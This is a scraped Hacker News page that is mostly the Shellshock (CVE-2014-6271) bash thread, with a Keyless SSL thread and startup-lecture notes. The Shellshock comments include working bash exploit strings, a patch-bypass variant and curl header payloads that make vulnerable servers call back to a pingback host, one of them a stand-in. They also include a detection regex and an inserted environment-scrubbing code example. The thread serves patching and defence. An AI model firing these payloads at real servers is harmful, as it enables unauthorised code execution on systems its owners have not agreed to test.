bshimmin 3 days ago 3 replies      
I wish Buzzfeed only had articles like this.
29
diestl 3 days ago 4 replies      
Not sure what this has got to do with programming?
30
ozy23378 2 days ago 3 replies      
> As a result, my left brain, the expert at numbers and language and logic and reasoning, a part of it suffocated and died. My right brain, the specialist with regard to color, music, creativity, intuition, and emotions, therefore could not talk to my left brain.

This popular myth of broad specialization of the hemispheres needs to die. The author lost credibility there.

4
CVE-2014-6271: Remote code execution through bash
762 points by vault_  13 hours ago   369 comments top 60
1
daveloyall 4 hours ago 1 reply      
There's some misunderstanding of how the one-liner works, so here's a writeup.

You can break the one-liner into two lines to see what is happening.

    1. hobbes@media:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@media:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. bash: warning: badvar: ignoring function definition attempt
    4. bash: error importing function definition for `badvar'
    5. I am an innocent sub process in 4.3.25(1)-release

1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash spots the specially formed variable (named badvar), prints a warning,

4. ...and apparently doesn't define the function at all?

5. But other than that, the child bash runs as expected.

And now the same two input lines on an OLD bash:

    1. hobbes@metal:~$ export badvar='() { :;}; echo vulnerable'
    2. hobbes@metal:~$ bash -c "echo I am an innocent sub process in '$BASH_VERSION'"
    3. vulnerable
    4. I am an innocent sub process in 4.3.22(1)-release

1. Create a specially crafted environment variable. Ok, it's done. But, nothing has happened!

2. Create an innocent sub process. Bash in this case. During initialization...

3. ...bash accidentally EXECUTES a snippet that was inside the variable named 'badvar'?!

4. But other than that, the child bash runs as expected. Wow, I should update that machine. :)

2
andrew13 2 hours ago 5 replies      
It might still be an issue. The patches may not have done enough.

$ env X='() { (a)=>\' sh -c "echo date"; cat echo

https://twitter.com/taviso/status/514887394294652929#

env X='() { (a)=>\' bash -c "echo echo vuln"; [[ "$(cat echo)" == "vuln" ]] && echo "still vulnerable :("

3
jimrandomh 12 hours ago 3 replies      
If you are responsible for the security of any system, this is your immediate, drop-everything priority. The technical details of the exploit mean that new ways of exploiting it will be discovered soon. Precedent suggests that automated systematic attacks against every server on the Internet will be coming, on a time scale of hours.
4
jingo 17 minutes ago 0 replies      
A quick fix would be to stop using bash.

I write hundreds of shell scripts per year and I never, ever use bash. Everything can be done with a less complex /bin/sh having only POSIX-like features.

There's no reason webservers have to use bash by default.

Sysadmins might need a hefty shell with lots of features in order to do their work, but an httpd should not need access to bash-isms. It should work fine with a very minimal POSIX-like shell.

I'm glad the systems I use do not have bash installed by default. The only time I ever use it is when a software author tries to force me to use bash by writing their install scripts in it and using bash-isms so the script will not run with a simpler shell like a BSD /bin/sh.

5
cft 6 hours ago 1 reply      
Here's how to patch Ubuntu 8.04 or anything where you have to build bash from source:

  #assume that your sources are in /src
  cd /src
  wget http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz
  #download all patches
  for i in $(seq -f "%03g" 0 25); do wget http://ftp.gnu.org/gnu/bash/bash-4.3-patches/bash43-$i; done
  tar zxvf bash-4.3.tar.gz
  cd bash-4.3
  #apply all patches
  for i in $(seq -f "%03g" 0 25);do patch -p0 < ../bash43-$i; done
  #build and install
  ./configure && make && make install

Not sure if Ubuntu 8.04 with custom built bash will be upgradable to 10.04??

6
antocv 6 hours ago 2 replies      
Funny, this works even after bash fix / upgrade

env X='() { (a)=>\' sh -c "echo date"; cat e

From http://seclists.org/oss-sec/2014/q3/672

7
userbinator 3 hours ago 0 replies      
According to http://wiki.bash-hackers.org/syntax/basicgrammar it appears that this is because bash allows functions to be exported through environment variables into subprocesses, but the code to parse those function definitions seems to be the same used to parse regular commands (and thus execute them).

Edit: after a brief glance over the affected code, this might not be so easy to patch completely - the actual method where everything interesting starts to take place is initialize_shell_variables in variables.c and parse_and_execute() in builtins/evalstring.c, so parsing and execution happen together; this is necessary to implement the shell grammar and is part of what makes it so powerful, but it can also be a source of vulnerabilities if it's not used carefully. I suppose one attempt at fixing this could be to separate out the function parsing code into its own function, one which can't ever cause execution of its input, and use that to parse function definitions in environment variables. This would be a pretty easy and elegant thing to do with a recursive-descent parser, but bash uses a lex/yacc-generated one to consume an entire command at once...

However, all in all I'm not so sure this ability to export funcdefs is such a good idea - forking a subshell automatically inherits the functions in the parent, and if it's a shell that wasn't created in such a manner, if it needs function definitions it can read them itself from some other source. This "feature" also means environment variables cannot start with the string '() {' (and exactly the string '() {' - even removing the space between those characters, e.g. '(){', doesn't trigger it) without causing an error in any subprocess - violating the usual assumption that environment variables can hold any arbitrary string. It might be a rare case, but it's certainly a cause for surprise.

8
masterleep 13 hours ago 2 replies      
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

From https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

9
JoshTriplett 11 hours ago 3 replies      
Is it just me, or are the patches "fixing" the vulnerability woefully insufficient? With the patch, bash stops executing the trailing code, but it still allows defining arbitrary shell functions from environment variables. So, even though the patch fixes the ability to exploit this via SSH_ORIGINAL_COMMAND or HTTP_*, anything that can set environment variables can still override an arbitrary command. (Note that privileged environments typically filter out attempts to set PATH, LD_LIBRARY_PATH, and so on.)

This applies even if your shell script or shell snippet uses the full paths to commands. For instance:

    $ env '/sbin/foo'='() { echo exploit; }' bash -c '/sbin/foo'
    exploit

10
agwa 13 hours ago 4 replies      
It is a very good thing that Debian and Ubuntu use /bin/dash for /bin/sh by default, since /bin/sh is implicitly invoked all over the place (e.g. by system(3)). Distros which use /bin/bash for /bin/sh are gonna have a bad time.

Edit: not implying that Debian and Ubuntu aren't affected too, just that the impact there will be lessened.

11
Eclyps 9 hours ago 3 replies      
Amazon's Linux distro for EC2 is still waiting for a patch.

EDIT: Finally got things updated. Bulletin can be found here: https://alas.aws.amazon.com/ALAS-2014-418.html

If yum isn't finding the update, try running "yum clean all" and then "yum update bash"

12
khaki54 13 hours ago 1 reply      
So I took a great unix/linux systems programming class, http://sites.fas.harvard.edu/~lib215/ where you learn about all of the system software that you take for granted. Among other things, we had to write our own shell. There is an awful lot to consider, and most of it you are just trying to get to work properly. With regard to security, you feel like you are protected for the most part because the shell resides in userland and it's basically understood that you shouldn't trust foreign shell scripts.

Is the worry here that the code gets executed by the kernel or superuser, enabling privilege escalation? Otherwise it wouldn't be a big deal that extra code is executed by a function declaration.

13
0x0 4 hours ago 2 replies      
The currently published fix is claimed to be incomplete: https://twitter.com/taviso/status/514887394294652929
14
_wmd 12 hours ago 1 reply      
As an example of who might be impacted, since openssh preserves the original command line passed to the ssh server when authenticating a public key that has a fixed command associated in authorized_keys, GitHub and BitBucket security teams are probably both having a really exciting day.
15
h43k3r 8 hours ago 1 reply      
I tested some of the sites and successfully executed some test code. One can easily google for such sites. The important thing is that, the link using which I ran the code is of a .gov site.

This thing seriously needs to be patched asap. Update your systems now.

16
flebron 12 hours ago 2 replies      
Maybe I'm doing something wrong, but I just tested it in ZSH (5.0.5, Linux) and the same vulnerable behavior seems to show up.
17
why-el 10 hours ago 1 reply      
Is someone from Heroku online here right now? My apps are all affected and since I am trusting Heroku with this, I am hoping they patch the system as soon as possible.
18
MBlume 8 hours ago 3 replies      
I'm a bit confused about how to properly patch my mac.

Homebrew installs upgraded bash to /usr/local/bin/bash, everyone says what I should do is run 'chsh -s /usr/local/bin/bash' but if I have a script that has a /bin/bash hashbang at the top, won't it still use the vulnerable bash install?

I mean I guess the answer is "you're probably not hosting a publicly accessible service on your mac, who cares?", which is true in my case, but still.

19
Zweihander 13 hours ago 1 reply      
20
gwillem 7 hours ago 3 replies      
This is quite stealthy way to scan, as Accept headers are generally not logged:

    curl -H 'Accept: () { :;}; /usr/bin/curl -so /dev/null http://my.pingback.com' 
Found nothing so far though. IMHO the number of Bash CGI scripts in the wild must be pretty low.

21
m4r71n 12 hours ago 0 replies      
Some more information was just posted to oss-sec:

http://seclists.org/oss-sec/2014/q3/650

22
AnimalMuppet 11 hours ago 1 reply      
Off topic:

This is why I keep coming back to HN. I've gotten an amazing amount of useful info on this very quickly. Great discussion - no trolling, no BS, just serious questions and serious answers.

23
AntiRush 5 hours ago 1 reply      
It seems like the current patch might not be a complete fix:

http://seclists.org/oss-sec/2014/q3/671

24
Oculus 13 hours ago 4 replies      
Have big security vulnerabilities been cropping up more often recently or does it seem that way because I've started to pay attention?
25
rurban 1 hour ago 0 replies      
What I'm really worried about now is every single cable modem and router out there, as they are very rarely updated. They run their shit for years. The bigger routers yes, but smaller ones and the modems not.
26
iuguy 12 hours ago 3 replies      
My OSX Mavericks install appears to be affected:

  foom:~ steve$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
  vulnerable
  this is a test

27
BenjaminCoe 9 hours ago 1 reply      
Wanted to share the simple Ansible script we used to patch CVE-2014-6271 at npm: https://github.com/npm/ansible-bashpocalypse
28
detectify 6 hours ago 0 replies      
We have added the CVE to our scanning routines and the update is now online on www.detectify.com. Test your environment for unpatched servers. In times like these it's OK to go for our free plan.
29
ecze 12 hours ago 2 replies      
With this bug, bash access to CiscoCallmanager is possible... Tested and working....
30
jtchang 7 hours ago 0 replies      
For this to happen the attacker has to control environment variables and then a bash shell is spawned.

Lots of web stuff spawn shells setting environment variables to stuff in HTTP headers. LC_TIME with some time zone settings might be one.
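
An added example, not from any commenter in this thread: a gateway-side filter built on userbinator's observation that only values beginning with exactly '() {' are parsed as function definitions, and on jtchang's point that request headers end up in the child's environment. The function names, the logger name and the sample request are constructed for illustration; the header-to-variable mapping follows the CGI convention (RFC 3875).

```python
import logging

log = logging.getLogger("cgi-env-scrub")  # hypothetical logger name

# Exact four-character prefix that affected bash versions treat as an exported
# function definition (per the thread, "(){" without the space does not match).
FUNC_PREFIX = "() {"

# Headers that CGI passes to the child without the HTTP_ prefix.
UNPREFIXED = {"content-type": "CONTENT_TYPE", "content-length": "CONTENT_LENGTH"}


def header_to_env_name(header):
    """Map an HTTP header name to its CGI meta-variable name."""
    lowered = header.lower()
    if lowered in UNPREFIXED:
        return UNPREFIXED[lowered]
    return "HTTP_" + header.upper().replace("-", "_")


def is_function_export(value):
    """True when bash would try to import this value as a function."""
    return value.startswith(FUNC_PREFIX)


def scrub_env(env):
    """Return (clean_env, dropped_names) for an inherited environment."""
    clean, dropped = {}, []
    for name, value in env.items():
        if is_function_export(value):
            dropped.append(name)
            log.warning("dropped env %s, value starts %r", name, value[:60])
        else:
            clean[name] = value
    return clean, dropped


def build_cgi_env(headers, inherited=None):
    """Build a CGI child's environment from request headers.

    Returns (env, findings). Each finding is (source, env_name), so the
    gateway can log headers that an access log would not normally record.
    """
    env, dropped = scrub_env(inherited or {})
    findings = [("inherited", name) for name in dropped]
    for header, value in headers:
        name = header_to_env_name(header)
        if is_function_export(value):
            findings.append((header, name))
            log.warning("dropped header %s, value starts %r", header, value[:60])
            continue
        env[name] = value
    return env, findings


# Constructed sample request; the Accept value is the test string from this thread.
SAMPLE_HEADERS = [
    ("Host", "example.com"),
    ("User-Agent", "Mozilla/5.0 (constructed)"),
    ("Accept", "() { :;}; echo vulnerable"),
    ("Cookie", "(){ no space, so not the trigger prefix"),
    ("Content-Type", "text/plain"),
]
SAMPLE_INHERITED = {"PATH": "/usr/bin:/bin", "TERM": "() { :;}; echo vulnerable"}

if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    env, findings = build_cgi_env(SAMPLE_HEADERS, SAMPLE_INHERITED)
    print(sorted(env))
    print(findings)
```

Because the whole value is dropped, the filter also covers the function-override case JoshTriplett describes in comment 9, where nothing trails the function body.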

31
sauere 13 hours ago 1 reply      
No update out for Ubuntu Server 14.04 yet.

/edit: the Red Hat blog has a good overview https://securityblog.redhat.com/2014/09/24/bash-specially-cr...

32
saurabhnanda 10 hours ago 0 replies      
Am I vulnerable if using the Paperclip gem to manage file uploads on a Rails app (it internally fires up 'convert' to generate thumbnails, I believe).

What if there is an haproxy sitting in front of the Rails app?

33
ilconsigliere 12 hours ago 2 replies      
Am I wrong in thinking that seems a bit worse than Heartbleed?
34
SchizoDuckie 8 hours ago 0 replies      
I'm by no means an expert, but am I completely wrong if I think something like this should work on an exploitable system to get a pingback from a vulnerable system without curl ?

  curl -A "() { :; }; echo GET /pingback.php | telnet bashexploitindexer.fake 80" http://expoitablehost.com/blah.cgi

35
jdimov 9 hours ago 1 reply      
All the explanations of why this is bad seem to involve CGI. Didn't the CGI interface die in the 90's? Who uses that nowadays?
36
jamiepenney 3 hours ago 0 replies      
Looks like Raspbian have updated their bash package with the fix, so my Raspberry Pi is safe.
37
vhost- 8 hours ago 0 replies      
For those of us with large clusters and chef, here is a useful knife command for updating bash on debian/ubuntu systems:

knife ssh 'name:*' 'sudo apt-get update && sudo apt-get install -y --only-upgrade bash'

38
throwaway49152 6 hours ago 2 replies      
What would be the best way to go if using Debian 5 (lenny)?

The only service exposed is ssh, and no one outside the company has an account. Is it still vulnerable through ssh?

39
Sanddancer 10 hours ago 3 replies      
Can someone with mod_security test a regex I wrote that should mitigate this? /\(.?\)\s\{.?\}\s\;/ from testing seems to catch any variants that I can think of that can trigger this bug, but I don't have a machine easily available to me at the moment to test with, unfortunately.
40
piratebroadcast 10 hours ago 0 replies      
My friend tried it on Heroku - It is affected.
41
kacy 11 hours ago 0 replies      
Ubuntu has been patched, it appears. If you're on Ubuntu, try this:

sudo apt-get update

sudo apt-get --only-upgrade install bash

42
korzun 13 hours ago 2 replies      
FreeBSD appears to be affected.
43
super_mario 9 hours ago 3 replies      
Interestingly enough ancient BASH version 3.2 on Mac OS X 10.9.5 is not vulnerable:

    $ echo $BASH_VERSION
    3.2.51(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $

I manually patched my BASH 4.3 to patch level 25 so it's not vulnerable either.

    $ echo $BASH_VERSION
    4.3.25(1)-release
    $ x='() { :;}; echo vulnerable' bash -c "echo this is a test"
    bash: warning: x: ignoring function definition attempt
    bash: error importing function definition for `x'
    this is a test
    $

44
snissn 8 hours ago 0 replies      
Here is a very simple proof of concept that helped me understand the vulnerability:

  bash-3.2$ anyvariable='() { true; }; echo foo' bash
  foo

45
wyager 11 hours ago 0 replies      
This is what happens when you have two different processes doing IPC using a human interface mechanism.

Another huge family of vulnerabilities that exists for the same reason are SQL injection vulnerabilities. SQL was invented as a way for humans at a terminal to do database operations. However, we started using it as a way of doing IPC. The problem with using human interfaces as an IPC mechanism is that human interfaces are rarely well-defined or minimal, so it is very hard to constrain behavior to what you expect.

The way to fix all of these bugs is to use well-defined, computer-oriented IPC mechanisms where there is a clear distinction between code and data. For example, database queries might be constructed by function call instead of string manipulation, which could pack them into a safe TLV format with no chance of malicious query injection. Generating web server content from a different language could be done via a proper FFI or message passing mechanism, rather than CGI scripts.

46
jacksoncage 7 hours ago 0 replies      
Saved a lot of time again today with salt!

  $ salt * pkg.install bash refresh=True

and then check for right version

  $ salt * pkg.version bash
47
mirashii 11 hours ago 0 replies      
At a glance, one interesting use of this is a potential local privilege escalation on systems with a sudoers file which restrict commands which can be run to ones that include a bash script, and allow you to keep some environment variables.
48
ck2 12 hours ago 1 reply      
http://www.csoonline.com/article/2687265/application-securit...

Another attack surface is OpenSSH through the use of AcceptEnv variables. As well through TERM and SSH_ORIGINAL_COMMAND. An environmental variable with an arbitrary name can carry a nefarious function which can enable network exploitation.

49
kazinator 12 hours ago 0 replies      
Passing executable code in environment variables is an incredibly bad idea.

The parsing bug is a red herring; there are probably ways to exploit the feature even when it doesn't have the bug.

The parsing bug means that the mere act of defining the function in the child bash will execute the attacker's code stored in the environment variable.

But if this problem is closed, the issue remains that the attacker controls the environment variable; the malicious code can be put inside the function body. Even though it will not then be executed at definition time, perhaps some child or grand-child bash can be nevertheless goaded into calling the malicious function.

Basically this is a misfeature that must be rooted out, pardon the pun.

50
kalops 13 hours ago 4 replies      
so basically turn off AcceptEnv in sshd_config?
51
FranOntanaya 9 hours ago 0 replies      
Saucy wasn't patched by the time I did a do-release-upgrade a while ago.
52
pbrumm 9 hours ago 0 replies      
Don't forget to update your docker containers and restart them.
53
sauere 12 hours ago 0 replies      
Also: I was not able to test it yet since I am still on the road, but I believe the Cisco AnyConnect VPN client OS-detection is affected
54
ck2 13 hours ago 3 replies      
Has the redhat patch been pushed through centos yet?
55
mmagin 10 hours ago 0 replies      
The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025
56
peterwwillis 10 hours ago 1 reply      
Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something
  else outside your program--at least, not by accident. All command line
  arguments, environment variables, locale information (see perllocale),
  results of certain system calls (readdir(), readlink(), the variable
  of shmread(), the messages returned by msgrcv(), the password,
  gcos and shell fields returned by the getpwxxx() calls), and all
  file input are marked as "tainted".
  Tainted data may not be used directly or indirectly in any command
  that invokes a sub-shell, nor in any command that modifies files,
  directories, or processes, with the following exceptions:

57
javert 11 hours ago 3 replies      
So if a machine is not running a web server, does that mean that machine is not vulnerable?
58
piratebroadcast 10 hours ago 1 reply      
Someone please ELI5 (Explain Like I'm 5)?
59
piratebroadcast 10 hours ago 0 replies      
Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png
60
zobzu 12 hours ago 4 replies      
I have a feeling this is blown out of proportion. Who's running bash setuid exactly? Right. Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

5
Announcing Keyless SSL
507 points by jgrahamc  6 days ago   184 comments top 27
1
lucb1e 6 days ago 3 replies      
For those who want to understand how it works (it took me a minute, so I'll try to explain it simpler):

In simplified terms, the server usually stores a public and private key, and sends the public key to the client. The client generates a random password, encrypts it with the server's public key, and sends it to the server. Only anyone with the private key can decrypt the message, and that should only be the server.

Now you don't want to hand over this private key to Cloudflare if you don't need to, because then they can read all traffic. Up until now, you needed to.

What they did was take the private key and move it to a keyserver, owned by your bank or whomever. Every time the Cloudflare server receives a random password (which is encrypted with the public key) it just asks the keyserver "what does this encrypted message say?" After that it has the password to the connection and can read what the client (the browser) is sending, and write data back over the same encrypted connection. Without ever knowing what the private key was.

The connection from Cloudflare to your bank's webserver and keyserver can be encrypted in whatever way. It could be a fixed key for AES, it could be another long-lasting TLS connection (the overhead is mostly in the connection setup)... this isn't the interesting part and can be solved in a hundred fine ways.

Edit: Removed my opinion from this post. Any downvotes for my opinion would also push the explanation down (which I hope is useful to some). I mostly agree with the other comments anyway.
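
The exchange lucb1e describes, as an added sketch that is not CloudFlare's code or wire protocol: the edge holds only the public key and asks a keyserver to decrypt the client's secret. The toy textbook RSA with small constructed primes, the HMAC request authenticator between edge and keyserver, and every class and function name here are assumptions for illustration.

```python
import hashlib
import hmac
import secrets

# Toy RSA parameters, constructed for this example and far too small for real use.
P = 2**61 - 1   # Mersenne prime
Q = 2**89 - 1   # Mersenne prime
E = 65537


def derive_session_key(premaster, client_random, server_random):
    """Both ends derive the same session key from the shared premaster secret."""
    return hmac.new(premaster.to_bytes(16, "big"),
                    client_random + server_random, hashlib.sha256).digest()


class KeyServer:
    """Runs at the site owner; the only holder of the private exponent."""

    def __init__(self):
        self.n = P * Q
        self._d = pow(E, -1, (P - 1) * (Q - 1))   # never leaves this object
        self._edge_keys = {}                      # edge id -> request-auth key

    def public_key(self):
        return self.n, E

    def enroll_edge(self, edge_id):
        self._edge_keys[edge_id] = secrets.token_bytes(32)
        return self._edge_keys[edge_id]

    def revoke_edge(self, edge_id):
        self._edge_keys.pop(edge_id, None)

    def decrypt(self, edge_id, ciphertext, tag):
        """Answer 'what does this encrypted message say?' for enrolled edges only."""
        key = self._edge_keys.get(edge_id)
        if key is None:
            raise PermissionError("unknown or revoked edge")
        expected = hmac.new(key, ciphertext.to_bytes(32, "big"), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            raise PermissionError("bad request authenticator")
        return pow(ciphertext, self._d, self.n)


class EdgeServer:
    """Runs at the proxy; has the public key and an auth key, no private key."""

    def __init__(self, edge_id, auth_key, public_key, keyserver):
        self.edge_id, self.auth_key = edge_id, auth_key
        self.public_key, self.keyserver = public_key, keyserver

    def handshake(self, client_random, encrypted_premaster):
        server_random = secrets.token_bytes(16)
        tag = hmac.new(self.auth_key, encrypted_premaster.to_bytes(32, "big"),
                       hashlib.sha256).digest()
        premaster = self.keyserver.decrypt(self.edge_id, encrypted_premaster, tag)
        return server_random, derive_session_key(premaster, client_random, server_random)


def client_key_exchange(public_key):
    """Browser side: pick a random secret and encrypt it to the site's public key."""
    n, e = public_key
    premaster = secrets.randbits(128)
    return secrets.token_bytes(16), premaster, pow(premaster, e, n)


def run_demo():
    keyserver = KeyServer()
    edge = EdgeServer("edge-1", keyserver.enroll_edge("edge-1"),
                      keyserver.public_key(), keyserver)
    client_random, premaster, encrypted = client_key_exchange(keyserver.public_key())
    server_random, edge_key = edge.handshake(client_random, encrypted)
    client_key = derive_session_key(premaster, client_random, server_random)

    keyserver.revoke_edge("edge-1")   # site owner withdraws the edge's access
    try:
        edge.handshake(client_random, encrypted)
        rejected = False
    except PermissionError:
        rejected = True
    return {"keys_match": hmac.compare_digest(client_key, edge_key),
            "edge_holds_private_key": hasattr(edge, "_d"),
            "rejected_after_revoke": rejected}


if __name__ == "__main__":
    print(run_demo())
```

The edge still ends up with the session key, so it can read the connection's traffic; what it never holds is the long-term private key, and the keyserver can cut it off without reissuing a certificate.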

2
indutny 6 days ago 2 replies      
And my patch for OpenSSL that does the same thing: https://gist.github.com/indutny/1bda1561254f2d133b18 , ping me on email if you want to find out how to use it in your setup.
3
delinka 6 days ago 5 replies      
Instead of keeping the key in a potentially vulnerable place, they're putting it in an oracle: pass ciphertext to the oracle, get plaintext back. I'm interested in the authentication between CloudFlare and the oracle. Cryptographic examples involving an oracle tend to refer to the oracle as a black box that just blindly accepts data, transforms it, and replies. Of course, then the oracle's content (a key, an algorithm) risks exposure through deduction if an attacker can submit limitless requests. See http://en.wikipedia.org/wiki/Chosen-plaintext_attack

I'm not at all suggesting that CF hasn't thought of this; rather I want to see their mitigation of the risk.

4
mhandley 6 days ago 3 replies      
This seems to only slightly reduce the threat to the banks.

Currently, if someone compromises the Cloudflare servers, they gain the bank's private key and can impersonate the bank until the bank revokes their keys.

With this solution, if someone compromises the Cloudflare servers, they can impersonate the bank by relaying the decryption of the premaster secret through Cloudflare's compromised servers back to the bank. They can do this until Cloudflare notices and closes the security hole.

It's not clear that the difference is all that great in reality, as most of the damage will be done in the first 24 hours of either compromise.

5
personZ 6 days ago 4 replies      
After reading the beginning of the piece, I was expecting something more...profound. Some deep mathematical breakthrough or something.

Instead they separate the actual key signing, delegating it to the customer's device. That's nice and useful, but isn't quite what I was expecting.

6
teddyh 6 days ago 4 replies      
So the communication between Cloudflare and the actual SSL key holder is secured by what? Another key? In that case, any compromise of Cloudflare's key is the same as a compromise of the original SSL key (at least in the short term).
7
otterley 6 days ago 4 replies      
Keyless SSL is basically an analogue of ssh-agent(1) for OpenSSL. It's a nice feature that you no longer have to trust CloudFlare with your private key, but there's a huge tradeoff: if your keyserver is unavailable (ironically, due to any of the things CloudFlare is supposed to protect you from or buffer you against -- DDoS, network/server issues, etc.), they can no longer authenticate requests served on your behalf and properly serve traffic.
8
windexh8er 6 days ago 2 replies      
All other technicalities aside it's rather interesting. From an HSM perspective it either makes that hardware now very useful or very useless.

Think of a large organization - you've been there (or not), there are 30 internal applications with self-signed certificates. Fail. The organization had purchased an HSM, but never really got it deployed because - well, that was too complex and it didn't integrate well with 3rd party network hardware and failed miserably in your *nix web stack.

This could be interesting - and I'm not commenting with regard to the efficacy or security concerns around this, but mainly the workflow simplicity it provides to large organizations who end up in self-signed-cert-hell because HSMs don't interoperate easily in a lot of use cases.

But to my original statement - this is a very good thing or a very bad thing for Thales and the like. The only requirement for an actually certified HSM, really, is certification against some hardware and software standard you have a checkbox to fulfill. Beyond that this would be a killer in the middleground for those who want an HSM like functionality but don't have any requirements to meet other than housing a secure segment where key management can be done in a more controlled manner.

9
vader1 6 days ago 1 reply      
While this is a cool feature, I wouldn't say the improvement is more than marginal: all potentially sensitive customer data is still available to Cloudflare in plain text. And after all, with a Business plan you can already use your own ("custom") SSL certificate which you can then revoke at any time.

Why not offer a "pass through" mode where the proxying is done on the network layer rather than the application layer? Of course in such a modus all CDN-like functionality could no longer be offered, but it could still do a fair amount of DDOS protection, no?

10
mback2k 6 days ago 0 replies      
So, this is not actually keyless SSL but SSL using something like a Hardware Security Module over networked PKCS#11. Did I miss something?
11
zaroth 6 days ago 1 reply      
See: Secure session capability using public-key cryptography without access to the private key.

https://www.google.com/patents/US8782774

12
praseodym 6 days ago 4 replies      
So CloudFlare won't get your private key, but will still get to see unencrypted plaintext for all traffic? Sounds like a huge improvement...
13
xorcist 6 days ago 1 reply      
The article is somewhat light on content. There are standard protocols for HSM use. What is the reason you didn't use these? There are clear risks involved with inventing your own security related protocols.
14
_pmf_ 6 days ago 0 replies      
Are we reinventing Kerberos again?
15
blibble 6 days ago 3 replies      
isn't this completely missing the point, i.e. banks being able to say 'no third parties can see our clients identifying information/balances/etc?'

yes, the SSL key doesn't leave the bank, but everything it is protecting is..

16
bjornsing 6 days ago 0 replies      
> World-renowned security experts Jon Callas and Phil Zimmermann support CloudFlare's latest announcement sharing, One of the core principles of computer security is to limit access to cryptographic keys to as few parties as possible, ideally only the endpoints. Application such as PGP, Silent Circle, and now Keyless SSL implement this principle and are correspondingly more secure.

Ehh... I'd say Keyless SSL implements the opposite of that principle: encryption terminates with CloudFlare but authentication terminates in some bank.

17
yk 6 days ago 0 replies      
So the problem is, how to get a cloud in the middle while keeping the green lock in the browser? Just yesterday I read Douglas Adams's phrase "technology's biggest success over itself."
18
kcbanner 6 days ago 1 reply      
Interesting, but what about the latency issues of having to always contact the key server?
19
sarciszewski 6 days ago 0 replies      
That is amazing. I can't wait to play with this code :D
20
yusyusyus 6 days ago 1 reply      
How does this architecture address PFS? I'm guessing a future version would require the exchange of DH private key to make it work...
21
ambrop7 6 days ago 1 reply      
I don't like to sound hateful, but this is an obvious solution that any competent person knowing how TLS works would find. If someone tried to patent it, I suppose every smart card would be considered prior art. The only "novelty" is that the connection to the "smart card" is the network.

Not to say that it's not useful, but the article describes it as some grand invention.

22
general_failure 6 days ago 0 replies      
Well, CloudFlare can still read all the traffic. I thought that problem had been solved somehow.
23
diafygi 6 days ago 1 reply      
Is this the free SSL announcement that CloudFlare said it was going to announce in October?
24
liricooli 5 days ago 0 replies      
It seems that the correct title should have been "all your keys are belong to us".
25
EGreg 6 days ago 0 replies      
Wow, what a great read!
26
ilaksh 6 days ago 1 reply      
This is a discussion about cyberwarfare in a literal sense. The technical discussion shouldn't really be separated from the economic, political, social and human health concerns because all of those parts of the system interact deeply and directly.

A goal of total political cooperation or submission leads to economic sanctions leading to serious human health effects leading to defensive denial of service attacks. This accelerates the need to decentralize the financial network systems to make them more robust.

How can we imagine though that even after a complete transition to next generation systems that are ground-up distributed designs (not just stop-gap tweaks like this) that we won't have new types of attacks to deal with.

The starting point is the belief system that provides such fertile ground for conflict. We have to promote the idea that human lives have value and that lethal force is not an acceptable way to resolve conflict.

As long as decision makers are living in a sort of 1960s James Bond fantasy world we will all be subject to the insecurity of that type of world. It's largely built upon a type of primitive Social Darwinism that is still much more prevalent than most will acknowledge.

It's much easier to accept a compartmentalization of these problems and focus on a narrow technical aspect, but that does not integrate nearly enough information.

27
zameericle 6 days ago 1 reply      
Sounds like Elliptic Curve Diffie-Hellman is used between client/server to establish a private key. Not sure how this is new.
6
Lecture 1 How to Start a Startup [video]
484 points by declan  1 day ago   176 comments top 44
1
philipDS 1 day ago 8 replies      
I made some notes while watching/listening. Might include minor errors or misinterpretation on my side

4 critical parts: Idea, Team, Product, Execution

1. Idea

-> Good startups take about 10 years

-> Startup should feel like an important mission

-> Hardest part coming up with great ideas: best look terrible at the beginning (e.g. search engine, social networks limited to college students without money, a way to stay at stranger's couches)

-> "Today only a small subset of users want to use my product, but I'm going to get all of them"

-> You need to believe and be willing to ignore naysayers

-> Most people will think your idea is bad: be happy. they won't compete. it's not dangerous to tell people your idea.

-> it's okay if it doesn't sound big at first. first version should take over a small specific market and expand from there. unpopular but right

-> take the time to think about how the market will evolve. market size in ~10 years. think about growth rate of the market instead of its current size. small, but rapidly growing market! people are desperate for a solution

-> you cannot create a market that does not exist

-> there are many great ideas, pick and find one you really care about.. "SW is eating the world"

-> "Why Now?" - dixit Sequoia - have a great answer to this question

-> Build something that you yourself need. You'll understand it a lot better.

-> Get close to your customers. Work in their office or talk to them multiple times a day

-> If it takes more than a sentence to you know what you're doing, it likely is too complicated

-> "Do more when you're a student." Think about new ideas and meet potential co-founders

-> Think about the market first and you'll have a big leg up

2. Product

-> Great Idea > Great Product > Great Company

-> Until you build a great product, almost nothing else matters

-> Sit in front of the computer working on product, or talk to your customers

-> Biz Dev, Raising Money, Raising Press, Hiring are significantly easier when you have a great product

-> Step 1: build something that users love

-> YC is all about: Exercise, Eat, Sleep, Work on Product and Talk to Customers

-> "It's better to build something that a small number of users love, than a large number of users like"

-> Get growth by word of mouth. This works for consumer as well as enterprise products. You'll see organic growth. If you don't have some early organic growth, then your product isn't good enough. It's the secret sauce to growth hacking.

-> Breakout companies always have a product that's so good that it grows on word of mouth

-> Great products win. Make something users love.

-> Keep it simple. Look at first versions of Google, Facebook, iPhone

-> Founders care about small details. They're fanatical

-> One thing that correlates with success is hooking up PagerDuty to their ticketing system. Response time within an hour.

-> Go recruit your first users by hand to get feedback every day.

